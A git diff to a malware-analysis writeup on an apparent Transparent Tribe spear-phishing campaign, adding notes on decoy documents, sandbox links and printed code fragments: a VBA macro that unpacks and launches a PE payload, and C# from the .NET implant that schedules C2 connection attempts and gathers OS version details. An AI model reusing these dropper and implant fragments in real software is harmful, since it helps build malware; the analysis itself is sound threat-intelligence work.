diff --git a/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md b/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md index b76780a..c767e66 100644 --- a/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md +++ b/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md @@ -13,7 +13,7 @@ + [Ressources](#Ressources)

Malware analysis

-
The initial vector is a maldoc called ```"Criteria of Army Officers.doc" ```, this use a macro for extract and execute the PE file depends on the version of the operating system
+
The initial vector is from a decoy document probably shared from a spear-phishing, this document have two links for download additionnal informations. The both maldoc , this use a macro for extract and execute the PE file depends on the version of the operating system.
```vb Sub unMoferzip(Fname As Variant, FileNameFolder As Variant) @@ -23,6 +23,7 @@ Sub unMoferzip(Fname As Variant, FileNameFolder As Variant) Set oApp = CreateObject("Shell.Application") oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4 End Sub + Sub MoferfileLdr() Dim path_Mofer_file As String Dim file_Mofer_name As String @@ -59,6 +60,41 @@ Sub MoferfileLdr() End Sub ``` +
The .NET implant begin to load the recon actions, push a timer for sleep the process and try to join the C2.
+ +```csharp +public void ulhtagniasdo_start() +{ + ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[0]; + this.ulhtagniasrunTime = DateTime.Now; + this.ulhtagniasUPC = new ulhtagniasMYINF(); + this.ulhtagniasCMD = new ulhtagniasOCMD(this); + this.ulhtagniasHD.iserver = this; + this.ulhtagniasHD.ulhtagniasmainPath = ulhtagniasCONF.ulhtagniasget_mpath(); + TimerCallback callback = new TimerCallback(this.ulhtagniaslookup_connect); + System.Threading.Timer ulhtagniastimer = new System.Threading.Timer(callback, this.ulhtagniasStateObj, 32110, 36110); + this.ulhtagniasStateObj.ulhtagniastimer = ulhtagniastimer; +} +``` + +
Can read the Operation System
+ +```csharp +public static string ulhtagniasOsname() +{ + string result; + try + { + OperatingSystem osversion = Environment.OSVersion; + result = osversion.Version.Major.ToString() + ">" + osversion.Version.Minor.ToString(); + } + catch + {result = "6>1!ulhtagnias".Split(new char[]{'!'})[0];} + return result; +} +``` +
+

Threat Intelligence

Cyber kill chain

@@ -97,6 +133,8 @@ End Sub
Links Anyrun:
+* [Special Benefits.docx](https://app.any.run/tasks/37407c30-de54-423f-a468-5981c50ced6f) +* [7All Selected list.xls](https://app.any.run/tasks/db365b0c-883e-410c-975d-d14753a5bfb4) * [Criteria of Army Officers.doc](https://app.any.run/tasks/de93d3a4-9ff0-4bed-b492-1f45214a0443)
Resources :